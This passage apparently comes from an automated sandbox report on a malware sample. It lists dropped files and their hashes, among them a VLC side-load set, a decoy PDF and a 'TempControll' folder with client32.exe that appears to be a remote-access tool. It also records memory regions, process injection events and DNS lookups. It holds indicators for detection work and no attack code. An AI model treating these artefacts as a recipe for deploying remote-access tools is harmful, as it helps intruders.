| US | 8.8.8.8:53 | 109.234.82.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
Files
memory/1292-0-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2052-3-0x0000000003170000-0x0000000003198000-memory.dmp
memory/2052-10-0x00000000031B8000-0x00000000031C0000-memory.dmp
memory/2052-13-0x00000000031C0000-0x00000000031C8000-memory.dmp
memory/2052-34-0x0000000003218000-0x0000000003220000-memory.dmp
memory/2052-33-0x0000000003208000-0x0000000003210000-memory.dmp
memory/2052-32-0x00000000031B0000-0x00000000031B8000-memory.dmp
memory/2052-31-0x00000000031A8000-0x00000000031B0000-memory.dmp
memory/2052-30-0x0000000003210000-0x0000000003218000-memory.dmp
memory/2052-36-0x0000000003220000-0x0000000003228000-memory.dmp
memory/2052-38-0x0000000003228000-0x0000000003230000-memory.dmp
memory/2052-43-0x0000000001610000-0x0000000001611000-memory.dmp
memory/2052-42-0x0000000003238000-0x0000000003240000-memory.dmp
memory/2052-41-0x0000000003230000-0x0000000003238000-memory.dmp
memory/2052-46-0x0000000003240000-0x0000000003248000-memory.dmp
memory/2052-50-0x0000000003248000-0x0000000003250000-memory.dmp
memory/2052-49-0x0000000003170000-0x0000000003198000-memory.dmp
memory/2052-54-0x0000000003250000-0x0000000003258000-memory.dmp
memory/2052-53-0x00000000031B8000-0x00000000031C0000-memory.dmp
memory/2052-57-0x00000000031C0000-0x00000000031C8000-memory.dmp
memory/2052-58-0x0000000003258000-0x0000000003260000-memory.dmp
memory/2052-61-0x0000000001610000-0x0000000001611000-memory.dmp
memory/2052-65-0x0000000003260000-0x0000000003268000-memory.dmp
memory/2052-64-0x0000000003218000-0x0000000003220000-memory.dmp
memory/2052-63-0x00000000031A8000-0x00000000031B0000-memory.dmp
memory/2052-62-0x0000000003210000-0x0000000003218000-memory.dmp
memory/2052-67-0x0000000003268000-0x0000000003270000-memory.dmp
memory/2052-71-0x0000000003270000-0x0000000003278000-memory.dmp
memory/2052-70-0x0000000003220000-0x0000000003228000-memory.dmp
memory/2052-76-0x0000000003278000-0x0000000003280000-memory.dmp
memory/2052-75-0x0000000003230000-0x0000000003238000-memory.dmp
memory/2052-74-0x0000000003228000-0x0000000003230000-memory.dmp
memory/2052-82-0x0000000003280000-0x0000000003288000-memory.dmp
memory/2052-86-0x0000000003288000-0x0000000003290000-memory.dmp
memory/2052-85-0x0000000003238000-0x0000000003240000-memory.dmp
memory/2052-89-0x0000000003240000-0x0000000003248000-memory.dmp
memory/2052-90-0x0000000003290000-0x0000000003298000-memory.dmp
memory/2052-94-0x0000000003298000-0x00000000032A0000-memory.dmp
memory/2052-93-0x0000000003248000-0x0000000003250000-memory.dmp
memory/2052-96-0x0000000003250000-0x0000000003258000-memory.dmp
memory/2052-97-0x00000000032A0000-0x00000000032A8000-memory.dmp
memory/2052-102-0x00000000032A8000-0x00000000032B0000-memory.dmp
memory/2052-101-0x0000000003258000-0x0000000003260000-memory.dmp
memory/2052-105-0x00000000032B0000-0x00000000032B8000-memory.dmp
memory/2052-104-0x0000000003260000-0x0000000003268000-memory.dmp
memory/2052-108-0x00000000032B8000-0x00000000032C0000-memory.dmp
memory/2052-107-0x0000000003268000-0x0000000003270000-memory.dmp
memory/2052-112-0x00000000032C0000-0x00000000032C8000-memory.dmp
memory/2052-111-0x0000000003270000-0x0000000003278000-memory.dmp
memory/2052-115-0x0000000001610000-0x0000000001611000-memory.dmp
memory/2052-119-0x00000000032C8000-0x00000000032D0000-memory.dmp
memory/2052-118-0x0000000003278000-0x0000000003280000-memory.dmp
memory/2052-122-0x00000000032D0000-0x00000000032D8000-memory.dmp
memory/2052-121-0x0000000003280000-0x0000000003288000-memory.dmp
memory/2052-123-0x0000000001610000-0x0000000001611000-memory.dmp
memory/2052-126-0x00000000032D8000-0x00000000032E0000-memory.dmp
memory/2052-125-0x0000000003288000-0x0000000003290000-memory.dmp
memory/2052-130-0x00000000032E0000-0x00000000032E8000-memory.dmp
memory/2052-129-0x0000000003290000-0x0000000003298000-memory.dmp
memory/2052-136-0x00000000032A0000-0x00000000032A8000-memory.dmp
memory/2052-135-0x00000000032E8000-0x00000000032F0000-memory.dmp
memory/2052-134-0x00000000032F0000-0x00000000032F8000-memory.dmp
memory/2052-133-0x0000000003298000-0x00000000032A0000-memory.dmp
memory/2052-143-0x00000000032B0000-0x00000000032B8000-memory.dmp
memory/2052-142-0x0000000003300000-0x0000000003308000-memory.dmp
memory/2052-141-0x00000000032F8000-0x0000000003300000-memory.dmp
memory/2052-140-0x00000000032A8000-0x00000000032B0000-memory.dmp
memory/2052-147-0x0000000003308000-0x0000000003310000-memory.dmp
memory/2052-146-0x00000000032B8000-0x00000000032C0000-memory.dmp
memory/2052-150-0x0000000003310000-0x0000000003318000-memory.dmp
memory/2052-149-0x00000000032C0000-0x00000000032C8000-memory.dmp
memory/2052-152-0x0000000001610000-0x0000000001611000-memory.dmp
memory/2052-155-0x0000000003318000-0x0000000003320000-memory.dmp
memory/2052-153-0x0000000001610000-0x0000000001611000-memory.dmp
memory/2052-154-0x00000000032C8000-0x00000000032D0000-memory.dmp
memory/2052-157-0x00000000032D0000-0x00000000032D8000-memory.dmp
memory/2052-158-0x0000000003320000-0x0000000003328000-memory.dmp
memory/2052-163-0x0000000003328000-0x0000000003330000-memory.dmp
memory/2052-162-0x00000000032D8000-0x00000000032E0000-memory.dmp
memory/2052-169-0x0000000003330000-0x0000000003338000-memory.dmp
memory/2052-168-0x00000000032E0000-0x00000000032E8000-memory.dmp
memory/2052-174-0x0000000003338000-0x0000000003340000-memory.dmp
memory/2052-173-0x00000000032E8000-0x00000000032F0000-memory.dmp
memory/2052-172-0x00000000032F0000-0x00000000032F8000-memory.dmp
memory/2052-176-0x0000000003340000-0x0000000003348000-memory.dmp
memory/2052-179-0x0000000003300000-0x0000000003308000-memory.dmp
memory/2052-180-0x0000000003348000-0x0000000003350000-memory.dmp
memory/2052-178-0x00000000032F8000-0x0000000003300000-memory.dmp
memory/2052-182-0x0000000003350000-0x0000000003358000-memory.dmp
memory/2052-185-0x0000000003308000-0x0000000003310000-memory.dmp
memory/2052-186-0x0000000003358000-0x0000000003360000-memory.dmp
memory/2052-189-0x0000000003360000-0x0000000003368000-memory.dmp
memory/2052-188-0x0000000003310000-0x0000000003318000-memory.dmp
memory/2052-192-0x0000000003368000-0x0000000003370000-memory.dmp
memory/2052-191-0x0000000003318000-0x0000000003320000-memory.dmp
memory/2052-195-0x0000000003370000-0x0000000003378000-memory.dmp
memory/2052-194-0x0000000003320000-0x0000000003328000-memory.dmp
memory/2052-198-0x0000000001610000-0x0000000001611000-memory.dmp
memory/2052-201-0x0000000003328000-0x0000000003330000-memory.dmp
memory/2052-204-0x0000000003330000-0x0000000003338000-memory.dmp
memory/2052-205-0x0000000003338000-0x0000000003340000-memory.dmp
memory/2052-207-0x0000000003340000-0x0000000003348000-memory.dmp
memory/1424-221-0x00000000049C0000-0x00000000049F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\vlc.exe
| MD5 | e634616d3b445fc1cd55ee79cf5326ea |
| SHA1 | ca27a368d87bc776884322ca996f3b24e20645f4 |
| SHA256 | 1fcd04fe1a3d519c7d585216b414cd947d16997d77d81a2892821f588c630937 |
| SHA512 | 7d491c0a97ce60e22238a1a3530f45fbb3c82377b400d7986db09eccad05c9c22fb5daa2b4781882f870ab088326e5f6156613124caa67b54601cbad8f66aa90 |
C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\libvlccore.dll
| MD5 | 5bdff9dac8efdfedd169125e415a4111 |
| SHA1 | 51bca77b201aa86b53735290c91bf4180cefe28e |
| SHA256 | d5d609ce70c0459e07b7347f4a25d01e1526795d4c324034d4bbc9ac05d06ecd |
| SHA512 | 12aabb6ac23ea73d9625a3f61777f034951f333a30e17167d61c5a65d10acd2a83f392680d894ca941d20c84626f3257f3227c5f7f81c6d529b53edb0d8e4575 |
C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\libvlc.dll
| MD5 | 4b262612db64f26ea1168ca569811110 |
| SHA1 | 8e59964d1302a3109513cd4fd22c1f313e79654c |
| SHA256 | a9340c99206f3388153d85df4ca94d33b28c60879406cc10ff1fd10eae16523f |
| SHA512 | 9902e64eb1e5ed4c67f4b7e523b41bde4535148c6be20db5f386a1da74533ca575383f1b3154f5985e379df9e1e164b6bda25a66504edcfaa57d40b04fc658c7 |
memory/1424-229-0x00000000050E0000-0x0000000005708000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\ulgbkv
| MD5 | 8f37e80238556701210f07b7bbf91106 |
| SHA1 | b4593b7bd699bf461a568898e6b04f071476c8dd |
| SHA256 | 25a885ccdf9d1f231ef15d4abbf322513cd90ffa0699b553a64e73b0b70ca9e6 |
| SHA512 | df80ffa4625c7a35de4f577275c3794eca961cbd5ef0bd955a4a0cf662f783832ad6bc4496e8ebeb844d306d64dd0cf00f197ab419f9120bcfe804204b5be73e |
C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\bmrrr
| MD5 | d78f6cce7dd76163e1af90c2287b7a04 |
| SHA1 | 166e4715075b449fd6b9cde5ee06b66a2df050d2 |
| SHA256 | e48fe2b9bbffe143e8d9bf7f5559469de7edfc4b1a2185980379f3a74510e6e1 |
| SHA512 | 741ea7ae677185b41b0a8fc05dfe250a09d3f90856e073b7713110509cec8bd0764e7333e4bf8527edd2dea8c006a00ffd8b9b53b41db169ac546eed19dad82f |
memory/1376-240-0x00007FF9FEB10000-0x00007FF9FEC82000-memory.dmp
memory/2052-243-0x0000000001610000-0x0000000001611000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0qbxqo1y.exh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1376-263-0x00007FF7B4780000-0x00007FF7B4878000-memory.dmp
memory/1376-264-0x00007FFA0DCF0000-0x00007FFA0DD24000-memory.dmp
memory/1376-265-0x00007FF9FEE80000-0x00007FF9FF135000-memory.dmp
memory/4528-274-0x00007FF9FEB10000-0x00007FF9FEC82000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\eb6f13698dee2ec5fff6c81b8b88ab63.pdf
| MD5 | acfffe6de49ab6bbcb590e95d558111b |
| SHA1 | 51d7b4a4ef2851f4787805bd2eebc61f9f62ae34 |
| SHA256 | fd0bc347f27e479b565d6095bfdc96ef2f42a7ae8649c40e1e702c8f16ab6217 |
| SHA512 | 94fd4a2de31420576169b79c9617fb1eed4778fb50c17a9c8587b123169022e9338fe8d4b89bb5de5b06367eed6737e739423416c8be3f7f5f24b75b3b3ee28e |
memory/2052-279-0x0000000001610000-0x0000000001611000-memory.dmp
memory/2052-283-0x0000000001610000-0x0000000001611000-memory.dmp
memory/2052-284-0x0000000001610000-0x0000000001611000-memory.dmp
memory/4528-385-0x00007FF669D00000-0x00007FF669DF8000-memory.dmp
memory/4528-387-0x00007FF9FE850000-0x00007FF9FEB05000-memory.dmp
memory/4528-386-0x00007FFA0DA60000-0x00007FFA0DA94000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\78e2ff5b
| MD5 | a5d846508854a7780fdfa5d6e3b4bec6 |
| SHA1 | 2d39b673bd582973e7bd61f00b1b9ec00c420abf |
| SHA256 | 41c0d14d578a4b2ae282488a341e1aff4b2d514169b221616e0255fbfe5fe8a0 |
| SHA512 | 638bccded205a48b149c62a2cd3a415f1ac502bb1f1cb68c129db9b402ce6bce5b5d77a01e77dd0d520d42c891fa3a58beca5836906f4787eef63d490deedfc5 |
memory/4528-382-0x00007FF9FEB10000-0x00007FF9FEC82000-memory.dmp
memory/3624-395-0x00007FFA1CA90000-0x00007FFA1CC85000-memory.dmp
C:\Users\Admin\AppData\Roaming\TempControll\client32.exe
| MD5 | 290c26b1579fd3e48d60181a2d22a287 |
| SHA1 | e4c91a7f161783c68cf67250206047f23bd25a29 |
| SHA256 | 973836529b57815903444dd5d4b764e8730986b1bd87179552f249062ee26128 |
| SHA512 | 114a9f068b36a1edf5cce9269057f0cc17b22a10cd73cbed3ef42ae71324e41363e543a3af8be57b410c533b62bcf7f28650b464cce96e0e6c14819cdb90129a |
C:\Users\Admin\AppData\Roaming\TempControll\PCICL32.dll
| MD5 | d16ffa06a35601a73b73836bf905ed19 |
| SHA1 | b8231d36f921e5b75b592ea3374f19216a5c411f |
| SHA256 | 80cc439a0633add1dd964bb6bb40ccdcfec3ae28da39fd9416642ab0605d40ab |
| SHA512 | e79b8cfbdd4d86742420a334ab6e0d70bcd3393ab8b07ae6d49ec435aef2bcbd07681774ac7e66eca41c11aa086b398440f74f0b1b77087aa2c18b76c6f3a168 |
C:\Users\Admin\AppData\Roaming\TempControll\pcicapi.dll
| MD5 | dcde2248d19c778a41aa165866dd52d0 |
| SHA1 | 7ec84be84fe23f0b0093b647538737e1f19ebb03 |
| SHA256 | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 |
| SHA512 | c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166 |
C:\Users\Admin\AppData\Roaming\TempControll\MSVCR100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\TempControll\PCICHEK.DLL
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
C:\Users\Admin\AppData\Roaming\TempControll\client32.ini
| MD5 | 0cdedc9a0a1ee8c9f7ca140e543f2f1c |
| SHA1 | 2540f9e3c63b6174a60324b137ffb5697c1a7df8 |
| SHA256 | 3e63adc8fd536f6045c8ffde42649350f13df7b7d2f7f988f4bfb0591bf9afb6 |
| SHA512 | 068deac28541fb62792f49a3e368ea9949e3dba93f6c23a942d28e0d9ae87e3bb25a878a9d777a2ec2dc4b918fc0a357f7ce7534c22c62128f2fe2a7c7a14ae2 |
C:\Users\Admin\AppData\Roaming\TempControll\NSM.LIC
| MD5 | 12b8cc1d0a34012bbbbe86880333c567 |
| SHA1 | e89659c412af82e31e6d14c34e47d7cc4c5ec9a5 |
| SHA256 | 9c48ab2790281fca8d75abc805e6091f1b8133898852e6c09657d66f3dd0c48f |
| SHA512 | eb44405dc70b40f15463c075f57b535b6e7c5132a34a99a62d663566ddc50b82f329c40880ab4a5425fe41077d5eec2c28baa500d3b27182ac5f104038ca00dc |
C:\Users\Admin\AppData\Roaming\TempControll\HTCTL32.DLL
| MD5 | 2d3b207c8a48148296156e5725426c7f |
| SHA1 | ad464eb7cf5c19c8a443ab5b590440b32dbc618f |
| SHA256 | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 |
| SHA512 | 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 680407510c90ee4993405cc21a3a9e60 |
| SHA1 | befa482c34419dd4ed26a3e5467720143752a998 |
| SHA256 | 1e55c92eca80e75e31ae4f09309267619014894229a4a3191ca74d4962cafff0 |
| SHA512 | b856c6d2c105f66e6bf9f42208b5a3f685899bfd379cafc9d9212ee6f87819e04a7593db8c3d25601b009b9d647c729df023ac4e239d09e8eb77d24eb9cf2d8c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a12e9f958f6a2179ef9314b84678ffe1 |
| SHA1 | 1abd9a2f8bd5df0f44fa227f1b39d85820882315 |
| SHA256 | 9db7a2644d7c88acccf747f15f10f06a618c1691ed82fa6846f725a2a77e8ffe |
| SHA512 | 99e8cef0f508226a90db3434daa98a028c3ba71a70223095ffd4f13edb3e064fd9cf611c9d7146f573c0f92dde23df31309155836ed35b10a13ab031b909e6f2 |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | b30d3becc8731792523d599d949e63f5 |
| SHA1 | 19350257e42d7aee17fb3bf139a9d3adb330fad4 |
| SHA256 | b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3 |
| SHA512 | 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | 752a1f26b18748311b691c7d8fc20633 |
| SHA1 | c1f8e83eebc1cc1e9b88c773338eb09ff82ab862 |
| SHA256 | 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131 |
| SHA512 | a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5 |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | b640a1fd35b6da291a82e50751297936 |
| SHA1 | bab11eb2681fb11bebad30352134197442d066da |
| SHA256 | e983bfb52d4e8cb64382c29f91d7b4dbed12a9b471d0552f79b7e8e5fcda68e3 |
| SHA512 | d4924d4e5cb3d09ebd3a818e8a2a5df0cb6ae80d405e360f4b84d81d74585a0ab96c7a2c5e7f74d2664e4a882ca7fd8c863202170338dbc2ba96a34ed8801fda |
memory/3624-595-0x0000000065300000-0x000000006547B000-memory.dmp
memory/4536-598-0x00007FFA1CA90000-0x00007FFA1CC85000-memory.dmp
memory/4536-599-0x0000000000FB0000-0x0000000001015000-memory.dmp
memory/1652-601-0x0000000009B00000-0x0000000009C4D000-memory.dmp
memory/4536-602-0x0000000000FB0000-0x0000000001015000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:14
Platform
win10v2004-20240802-en
Max time kernel
89s
Max time network
157s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 792 wrote to memory of 4944 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 792 wrote to memory of 4944 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 792 wrote to memory of 4944 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge-32.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge-32.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4944 -ip 4944
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 600
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 52.111.227.11:443 | tcp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win7-20240903-en
Max time kernel
122s
Max time network
131s
Command Line
Signatures
Processes
C:\Windows\system32\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\jre\asm-all.jar
Network
Files
memory/1192-2-0x0000000002590000-0x0000000002800000-memory.dmp
memory/1192-10-0x0000000000240000-0x0000000000241000-memory.dmp
memory/1192-11-0x0000000002590000-0x0000000002800000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win7-20240903-en
Max time kernel
118s
Max time network
124s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1624 wrote to memory of 1780 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1624 wrote to memory of 1780 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1624 wrote to memory of 1780 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1624 wrote to memory of 1780 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1624 wrote to memory of 1780 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1624 wrote to memory of 1780 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1624 wrote to memory of 1780 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge-32.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge-32.dll,#1
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win10v2004-20240802-en
Max time kernel
133s
Max time network
156s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4420 wrote to memory of 2380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4420 wrote to memory of 2380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4420 wrote to memory of 2380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge-32.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge-32.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:14
Platform
win10v2004-20240802-en
Max time kernel
90s
Max time network
155s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1852 wrote to memory of 4256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1852 wrote to memory of 4256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1852 wrote to memory of 4256 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\bci.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\bci.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4256 -ip 4256
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 604
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win10v2004-20240802-en
Max time kernel
149s
Max time network
159s
Command Line
Signatures
Processes
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\jre\asm-all.jar
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files
memory/4476-2-0x0000014311360000-0x00000143115D0000-memory.dmp
memory/4476-11-0x0000014311340000-0x0000014311341000-memory.dmp
memory/4476-12-0x0000014311360000-0x00000143115D0000-memory.dmp